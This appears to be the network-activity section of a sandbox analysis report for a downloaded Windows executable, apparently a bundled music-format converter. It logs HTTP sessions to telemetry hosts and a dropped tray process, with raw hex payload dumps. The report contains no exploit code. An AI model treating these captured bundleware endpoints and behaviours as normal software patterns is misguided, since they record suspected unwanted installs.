                                                                                      Aug 4, 2023 18:49:25.476546049 CEST3497INData Raw: ba 8a 84 4c af 00 fb 1b 5c 1e 43 22 c2 64 71 e7 38 eb cc e3 9b 31 f9 8f c5 a7 d3 c8 25 86 ed be 4f 20 9b c3 5e 29 7c 49 36 78 f1 5a 4a a6 9d ce 5c d9 79 3e 43 d9 68 85 86 2c 3d 30 3b 6d c2 11 73 f2 05 52 2f 43 02 3c f9 57 18 93 db 37 51 7e 45 69
                                                                                      Data Ascii: L\C"dq81%O ^)|I6xZJ\y>Ch,=0;msR/C<W7Q~EiJb_/!O,cIt%\pBXd]KE O?X6n $5dfb`d&cJq0EE4urt#,dbVQ7F'uoad;vn[
                                                                                      Aug 4, 2023 18:49:25.476608992 CEST3499INData Raw: 81 e6 c1 15 cd 9e 55 08 3b f0 86 af bc 0b b3 85 d5 ef af d5 a2 59 0a a7 c6 d7 80 fd e3 89 75 fe 58 ab 5f 04 d3 aa bd 64 5a 3b 01 65 9c 73 af 71 3f 02 dc 1a c8 85 bf e3 75 8a 01 1a 73 ad 57 26 ca ee 5d dd 80 a1 83 8d 8c 30 55 f2 4b 5f ae df a7 ff
                                                                                      Data Ascii: U;YuX_dZ;esq?usW&]0UK_nCP44#ELxM}x~_=!k7hHS~W}CQo<8&~z7iOcG0?*0KIq9+DphJ~Q7
                                                                                      Aug 4, 2023 18:49:25.476670980 CEST3500INData Raw: 24 f7 d1 d8 3d a5 9f d9 47 92 12 0f 05 25 ad ee fe 89 78 6f 5c f4 7e 5c cb a1 eb b1 3f fc 50 80 0a 1d d9 25 a2 4c 98 c2 24 6c 00 22 26 d0 03 8a b8 90 d9 c7 a5 72 95 d4 59 fd 91 7a 42 ce 70 e6 cf d4 2c 9f f3 fc 47 c9 9e 2d 18 9c 7c bd 05 82 85 bc
                                                                                      Data Ascii: $=G%xo\~\?P%L$l"&rYzBp,G-|?x]~j@=\2lk8bY:'},4m|5 5OsP@!szeGhbbFDZXJ|BZMl%r_QPEOAqWY<7
                                                                                      Aug 4, 2023 18:49:25.476733923 CEST3501INData Raw: a0 3b cd 39 d5 03 b2 95 a6 de 5a 08 c1 c6 f5 5b f2 9f 07 ca a5 cf 78 42 39 e3 79 66 e2 8a ab c4 8a 66 3d c5 8f 38 14 bf f0 b0 b4 ac fa 62 45 fd af f3 52 1a 02 d0 70 15 95 00 19 39 b1 56 6d 0c e3 34 aa a4 a7 ba 6a 57 10 6c 55 e4 2c a9 74 43 76 c3
                                                                                      Data Ascii: ;9Z[xB9yff=8bERp9Vm4jWlU,tCv)MG>W$EG~)K! fjPb;I7aSSG=jFET/&7>/Isy9FgF.A?kDAiMntey*{':0lSZR\oT
                                                                                      Aug 4, 2023 18:49:25.476799965 CEST3503INData Raw: 25 b7 16 fe 7e 46 f4 a2 4b 49 62 a7 e6 21 3f a4 ca ce be 72 e4 e2 ed 43 6b e3 89 7f 8f 7e c7 49 63 a7 b8 2a 10 7a c5 31 d6 ee 19 67 37 02 41 5e fd 86 4b 9f 8f 57 b1 bb 9e 50 82 e9 eb 50 d8 b3 1a af 0c 26 94 af 39 10 d8 bf 18 92 ed f6 5d 04 93 20
                                                                                      Data Ascii: %~FKIb!?rCk~Ic*z1g7A^KWPP&9] 1*w-f#WB``iA4^)}qw;&M?<f I[KzW\LYD@ZTRd%B%!l7v`<uf[+7$d<FVr6@U
                                                                                      Aug 4, 2023 18:49:25.642350912 CEST3512INData Raw: 4c 9f 49 c3 d2 ec 57 a8 76 32 9c 17 8d a5 b3 43 05 1e 9c fc fc d9 53 fb 3e 02 1d 8d f8 71 19 e3 56 8f 2f 5b 08 a2 3c 61 13 1f a7 ce 78 21 3c 64 2e 36 e0 f2 b9 49 34 dc b1 62 b8 e1 30 b6 15 00 0d 66 44 b9 b1 88 e7 89 aa 9e 2e 7c 58 e2 81 8a 7f f6
                                                                                      Data Ascii: LIWv2CS>qV/[<ax!<d.6I4b0fD.|X,u+rjNB2M`j"0;fk5L;'rSd9|jyi'VJ{p,nNc`<XEho\_ml'V|IvnD!v


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      19192.168.2.349737123.57.49.3680C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:26.929320097 CEST5716OUTGET /log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&InstallDate=2023-08-04&ChannelCode=2&Ver=1.0.7.17&StartMode=0&OsVer=10.0&Action=runkit&step=1&Intact=1&Miss=&RunMode=0&UserEv=0&Sdsoft=0 HTTP/1.1
                                                                                      Accept: */*
                                                                                      User-Agent: Mozilla/4.0 (compatible; )
                                                                                      Host: api.flmgr.net
                                                                                      Aug 4, 2023 18:49:27.580758095 CEST5716OUTGET /log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&InstallDate=2023-08-04&ChannelCode=2&Ver=1.0.7.17&StartMode=0&OsVer=10.0&Action=runkit&step=1&Intact=1&Miss=&RunMode=0&UserEv=0&Sdsoft=0 HTTP/1.1
                                                                                      Accept: */*
                                                                                      User-Agent: Mozilla/4.0 (compatible; )
                                                                                      Host: api.flmgr.net
                                                                                      Aug 4, 2023 18:49:27.885349989 CEST5717INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:49:27 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 2
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 7b 7d
                                                                                      Data Ascii: {}
                                                                                      Aug 4, 2023 18:49:28.696743011 CEST5718INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:49:27 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 2
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 7b 7d
                                                                                      Data Ascii: {}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.349713221.204.21.100443C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      20192.168.2.349738180.163.251.23080C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:33.185724020 CEST5719OUTGET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=2004&r=0&d=3112701&tag=kittip HTTP/1.1
                                                                                      Accept: text/html, application/xhtml+xml, */*
                                                                                      Accept-Language: zh-CN
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Host: s.360.cn
                                                                                      Aug 4, 2023 18:49:33.452058077 CEST5719INHTTP/1.1 200 OK
                                                                                      Server: openresty/1.15.8.2
                                                                                      Date: Fri, 04 Aug 2023 16:49:33 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 0
                                                                                      Last-Modified: Fri, 27 Jul 2018 07:11:40 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "5b5ac5ac-0"
                                                                                      Accept-Ranges: bytes


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      21192.168.2.349739180.163.251.23080C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:33.728128910 CEST5720OUTGET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=0&r=0&d=3112701&tag=kittip HTTP/1.1
                                                                                      Accept: text/html, application/xhtml+xml, */*
                                                                                      Accept-Language: zh-CN
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Host: s.360.cn
                                                                                      Aug 4, 2023 18:49:34.003331900 CEST5720INHTTP/1.1 200 OK
                                                                                      Server: openresty/1.15.8.2
                                                                                      Date: Fri, 04 Aug 2023 16:49:33 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 0
                                                                                      Last-Modified: Fri, 27 Jul 2018 07:15:58 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "5b5ac6ae-0"
                                                                                      Accept-Ranges: bytes


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      22192.168.2.349743123.57.49.3680C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:35.512823105 CEST5721OUTGET /log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&Ver=1.0.7.17&ChannelCode=2&Action=pc_server&InstallDate=2023-08-04 HTTP/1.1
                                                                                      Host: api.flmgr.net
                                                                                      Accept: */*
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Aug 4, 2023 18:49:36.268959999 CEST5721OUTGET /log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&Ver=1.0.7.17&ChannelCode=2&Action=pc_server&InstallDate=2023-08-04 HTTP/1.1
                                                                                      Host: api.flmgr.net
                                                                                      Accept: */*
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Aug 4, 2023 18:49:36.574515104 CEST5722INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:49:36 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 2
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 7b 7d
                                                                                      Data Ascii: {}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      23192.168.2.349740180.163.251.23080C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:37.355326891 CEST5723OUTGET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=201&r=0&d=3112701&tag=kittip HTTP/1.1
                                                                                      Accept: text/html, application/xhtml+xml, */*
                                                                                      Accept-Language: zh-CN
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Host: s.360.cn
                                                                                      Aug 4, 2023 18:49:37.641964912 CEST5723INHTTP/1.1 200 OK
                                                                                      Server: openresty/1.15.8.2
                                                                                      Date: Fri, 04 Aug 2023 16:49:37 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 0
                                                                                      Last-Modified: Fri, 27 Jul 2018 07:03:26 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "5b5ac3be-0"
                                                                                      Accept-Ranges: bytes


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      24192.168.2.349744180.163.251.23080C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:37.923695087 CEST5724OUTGET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=218&r=0&d=3112701&tag=kittip HTTP/1.1
                                                                                      Accept: text/html, application/xhtml+xml, */*
                                                                                      Accept-Language: zh-CN
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Host: s.360.cn
                                                                                      Aug 4, 2023 18:49:38.202923059 CEST5724INHTTP/1.1 200 OK
                                                                                      Server: openresty/1.15.8.2
                                                                                      Date: Fri, 04 Aug 2023 16:49:38 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 0
                                                                                      Last-Modified: Fri, 27 Jul 2018 07:11:40 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "5b5ac5ac-0"
                                                                                      Accept-Ranges: bytes


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      25192.168.2.349747180.163.237.18580C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:45.614635944 CEST5742OUTGET /wsin/think?ipartner=3112701&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&mid=b8a4400180ee20f44982cb4d73d6fcd7&rand=129489&timestamp=1691200180&ver=3.0.0.2253&sign=674ed7833112441346026e4e45978c4c HTTP/1.1
                                                                                      Host: inf.safe.360.cn
                                                                                      Accept: */*
                                                                                      Pragma: no-cache
                                                                                      Cache-Control: no-cache
                                                                                      Aug 4, 2023 18:49:48.629519939 CEST5743OUTGET /wsin/think?ipartner=3112701&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&mid=b8a4400180ee20f44982cb4d73d6fcd7&rand=129489&timestamp=1691200180&ver=3.0.0.2253&sign=674ed7833112441346026e4e45978c4c HTTP/1.1
                                                                                      Host: inf.safe.360.cn
                                                                                      Accept: */*
                                                                                      Pragma: no-cache
                                                                                      Cache-Control: no-cache
                                                                                      Aug 4, 2023 18:49:48.884001970 CEST5810INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.9.15
                                                                                      Date: Fri, 04 Aug 2023 16:49:48 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Content-Length: 227
                                                                                      Connection: close
                                                                                      Data Raw: 7b 22 65 72 72 6e 6f 22 3a 30 2c 22 65 72 72 6d 73 67 22 3a 22 6f 6b 22 2c 22 64 61 74 61 22 3a 22 58 35 44 4f 58 71 4d 73 45 6a 4b 58 47 30 6c 61 62 30 70 55 54 6f 52 75 51 6a 37 53 70 58 62 53 36 51 5a 51 62 38 56 2f 55 64 4d 4b 2b 42 68 62 6d 42 49 50 52 52 48 33 72 49 70 67 6a 39 52 52 62 38 64 4b 6f 6a 31 45 58 73 4e 65 39 44 62 6c 63 7a 6e 37 6e 50 70 6e 35 65 6f 66 71 42 45 58 33 5a 61 37 71 46 68 73 64 2b 32 56 56 33 72 57 45 42 63 68 6c 78 56 4c 4d 53 78 79 38 41 36 30 54 49 57 39 2b 51 38 50 32 52 6c 33 31 68 39 46 46 57 59 68 4f 6e 4d 7a 62 32 38 39 34 49 48 6d 6e 44 43 64 32 43 41 32 36 2b 38 3d 22 2c 22 74 79 70 65 22 3a 31 2c 22 74 5f 73 74 72 22 3a 22 22 7d
                                                                                      Data Ascii: {"errno":0,"errmsg":"ok","data":"X5DOXqMsEjKXG0lab0pUToRuQj7SpXbS6QZQb8V/UdMK+BhbmBIPRRH3rIpgj9RRb8dKoj1EXsNe9Dblczn7nPpn5eofqBEX3Za7qFhsd+2VV3rWEBchlxVLMSxy8A60TIW9+Q8P2Rl31h9FFWYhOnMzb2894IHmnDCd2CA26+8=","type":1,"t_str":""}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      26192.168.2.349749180.163.251.23080C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:49.335874081 CEST5811OUTGET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=391&r=0&d=3112701&tag=kittip HTTP/1.1
                                                                                      Accept: text/html, application/xhtml+xml, */*
                                                                                      Accept-Language: zh-CN
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Host: s.360.cn
                                                                                      Aug 4, 2023 18:49:49.630974054 CEST5811INHTTP/1.1 200 OK
                                                                                      Server: openresty/1.15.8.2
                                                                                      Date: Fri, 04 Aug 2023 16:49:49 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 0
                                                                                      Last-Modified: Fri, 27 Jul 2018 07:11:38 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "5b5ac5aa-0"
                                                                                      Accept-Ranges: bytes


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      27192.168.2.349750180.163.251.23080C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:49.951328039 CEST5812OUTGET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=324&r=0&d=3112701&tag=kittip HTTP/1.1
                                                                                      Accept: text/html, application/xhtml+xml, */*
                                                                                      Accept-Language: zh-CN
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Host: s.360.cn
                                                                                      Aug 4, 2023 18:49:50.221330881 CEST5812INHTTP/1.1 200 OK
                                                                                      Server: openresty/1.15.8.2
                                                                                      Date: Fri, 04 Aug 2023 16:49:50 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 0
                                                                                      Last-Modified: Fri, 27 Jul 2018 07:11:40 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "5b5ac5ac-0"
                                                                                      Accept-Ranges: bytes


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      28192.168.2.349751180.163.251.23080C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:50.492405891 CEST5813OUTGET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=325&r=0&d=3112701&tag=kittip HTTP/1.1
                                                                                      Accept: text/html, application/xhtml+xml, */*
                                                                                      Accept-Language: zh-CN
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Host: s.360.cn
                                                                                      Aug 4, 2023 18:49:50.762577057 CEST5813INHTTP/1.1 200 OK
                                                                                      Server: openresty/1.15.8.2
                                                                                      Date: Fri, 04 Aug 2023 16:49:50 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 0
                                                                                      Last-Modified: Fri, 27 Jul 2018 07:16:06 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "5b5ac6b6-0"
                                                                                      Accept-Ranges: bytes


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      29192.168.2.349754180.163.251.23080C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:58.119146109 CEST6273OUTGET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=303&r=0&d=3112701&tag=kittip HTTP/1.1
                                                                                      Accept: text/html, application/xhtml+xml, */*
                                                                                      Accept-Language: zh-CN
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Host: s.360.cn
                                                                                      Aug 4, 2023 18:49:58.410943985 CEST6273INHTTP/1.1 200 OK
                                                                                      Server: openresty/1.15.8.2
                                                                                      Date: Fri, 04 Aug 2023 16:49:58 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 0
                                                                                      Last-Modified: Fri, 27 Jul 2018 07:15:54 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "5b5ac6aa-0"
                                                                                      Accept-Ranges: bytes


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      3192.168.2.349716120.52.95.245443C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      30192.168.2.349755180.163.251.23080C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:58.886266947 CEST6274OUTGET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002264&s=2004&r=0&d=3112701&tag=kittip HTTP/1.1
                                                                                      Accept: text/html, application/xhtml+xml, */*
                                                                                      Accept-Language: zh-CN
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Host: s.360.cn
                                                                                      Aug 4, 2023 18:49:59.505325079 CEST6275OUTGET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002264&s=2004&r=0&d=3112701&tag=kittip HTTP/1.1
                                                                                      Accept: text/html, application/xhtml+xml, */*
                                                                                      Accept-Language: zh-CN
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Host: s.360.cn
                                                                                      Aug 4, 2023 18:49:59.780165911 CEST6275INHTTP/1.1 200 OK
                                                                                      Server: openresty/1.15.8.2
                                                                                      Date: Fri, 04 Aug 2023 16:49:59 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 0
                                                                                      Last-Modified: Fri, 27 Jul 2018 07:11:40 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "5b5ac5ac-0"
                                                                                      Accept-Ranges: bytes


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      4192.168.2.349719120.52.95.247443C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      5192.168.2.349723120.52.95.245443C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      6192.168.2.349726218.12.76.161443C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      7192.168.2.349745104.192.108.19443C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      8192.168.2.349746104.192.108.19443C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      9192.168.2.349752104.192.108.19443C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.349707113.142.34.181443C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-08-04 16:48:20 UTC0OUTGET /api/ryapi?webid=2&softid=10042231&token=f4c629206dca1541c85c21d5d30ac4c7 HTTP/1.1
                                                                                      Cache-Control: no-store
                                                                                      Connection: Keep-Alive
                                                                                      Expires: 0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Host: www.onlinedown.net
                                                                                      2023-08-04 16:48:21 UTC0INHTTP/1.1 200 OK
                                                                                      Date: Fri, 04 Aug 2023 16:48:21 GMT
                                                                                      Content-Type: application/json
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Server: openresty
                                                                                      Set-Cookie: HWWAFSESID=096bb734ab52a6d213; path=/
                                                                                      Set-Cookie: HWWAFSESTIME=1691167701157; path=/
                                                                                      Cache-Control: no-cache, private
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization
                                                                                      X-CCDN-Origin-Time: 200
                                                                                      via: CHN-SNxian-AREACT6-CACHE57[293],CHN-SNxian-AREACT6-CACHE54[288,TCP_MISS,291],CHN-TJ-GLOBAL1-CACHE20[204],CHN-TJ-GLOBAL1-CACHE50[200,TCP_MISS,202]
                                                                                      x-hcs-proxy-type: 0
                                                                                      X-CCDN-CacheTTL: 0
                                                                                      2023-08-04 16:48:21 UTC1INData Raw: 34 39 31 0d 0a 7b 22 73 6f 66 74 69 64 22 3a 22 31 30 30 34 32 32 33 31 22 2c 22 73 6f 66 74 6e 61 6d 65 22 3a 22 5c 75 37 66 35 31 5c 75 36 36 31 33 5c 75 34 65 39 31 5c 75 39 37 66 33 5c 75 34 65 35 30 4e 43 4d 5c 75 36 38 33 63 5c 75 35 66 30 66 5c 75 38 66 36 63 5c 75 36 33 36 32 5c 75 35 36 36 38 22 2c 22 6c 6f 67 6f 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 6d 67 2e 6f 6e 6c 69 6e 65 64 6f 77 6e 2e 6e 65 74 5c 2f 64 6f 77 6e 6c 6f 61 64 5c 2f 32 30 32 32 30 31 5c 2f 30 38 34 37 33 35 2d 36 31 64 34 65 61 61 37 35 36 38 32 30 2e 6a 70 67 22 2c 22 70 75 62 64 61 74 65 22 3a 22 32 30 32 32 2d 30 31 2d 30 35 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 30 20 5c 75 35 62 39 38 5c 75 36 35 62 39 5c 75 37 32 34 38 22 2c 22 73 6f 66 74 73 69 7a 65 22 3a 22
                                                                                      Data Ascii: 491{"softid":"10042231","softname":"\u7f51\u6613\u4e91\u97f3\u4e50NCM\u683c\u5f0f\u8f6c\u6362\u5668","logo":"https:\/\/img.onlinedown.net\/download\/202201\/084735-61d4eaa756820.jpg","pubdate":"2022-01-05","version":"1.0 \u5b98\u65b9\u7248","softsize":"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.349710120.52.95.236443C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-08-04 16:48:22 UTC2OUTGET /download/202201/084735-61d4eaa756820.jpg HTTP/1.1
                                                                                      Host: img.onlinedown.net
                                                                                      Accept: */*
                                                                                      Accept-Encoding: deflate, gzip
                                                                                      Referer: https://www.onlinedown.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
                                                                                      2023-08-04 16:48:23 UTC2INHTTP/1.1 200 OK
                                                                                      Date: Fri, 04 Aug 2023 16:48:22 GMT
                                                                                      Content-Type: image/jpeg
                                                                                      Content-Length: 3018
                                                                                      Connection: close
                                                                                      Server: openresty
                                                                                      CloudServiceDiscount: CDN
                                                                                      ETag: "a7c80884be72c823f1a7b23c59590b01"
                                                                                      Last-Modified: Wed, 05 Jan 2022 00:47:35 GMT
                                                                                      x-obs-id-2: 32AAAQAAEAABAAAQAAEAABAAAQAAEAABCSNKspGauYvN2ToY3rIW4QRxwGcC+1zG
                                                                                      x-obs-request-id: 0000017E27B49E8690064A28E73B10F5
                                                                                      via: CHN-HElangfang-AREACUCC1-CACHE6[22],CHN-HElangfang-AREACUCC1-CACHE11[0,TCP_HIT,22],CHN-SH-GLOBAL1-CACHE11[10],CHN-SH-GLOBAL1-CACHE87[0,TCP_HIT,9]
                                                                                      x-hcs-proxy-type: 1
                                                                                      X-CCDN-CacheTTL: 2592000
                                                                                      nginx-hit: 1
                                                                                      Age: 49822391
                                                                                      Accept-Ranges: bytes
